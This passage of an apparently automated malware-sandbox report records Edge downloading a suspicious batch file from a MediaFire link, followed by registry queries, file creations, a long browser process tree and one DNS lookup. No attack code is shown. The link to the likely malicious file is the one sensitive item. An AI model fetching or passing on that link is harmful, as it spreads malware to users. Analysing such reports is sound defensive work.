| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\ta\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1096096730\male_names.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "139" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133906568156990024" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3582532709-2637047242-3508314386-1000\{426E5FE8-7F0F-4D80-8A32-FA7B8AB3F469} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f8,0x7ffe2c65f208,0x7ffe2c65f214,0x7ffe2c65f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1804,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2164,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3476,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4992,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5320,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5360 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5936,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5972,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5996 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5972,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5996 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1136
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6068,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:14
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6168,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5188,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5140 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6192,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6000 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6580,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6060 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6604 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1180,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5512 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6600,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5528 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5860,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1252,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=880 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5528,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5548 /prefetch:10
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5532,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=3308,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=3664,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6328,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7092,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=7112,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=5100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7036,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=7416,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7584,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7604 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7624,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7644,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=8000 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=7440,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=8072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=7628,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8016,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=8072 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=3684,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7464 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=6324,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=7408,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=5024,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=6112,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=7456,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=6728,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=4812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=5584,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=7056,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7396,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=7048 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5472,i,7055852667055915436,6361933211571695427,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:1
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39d2055 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
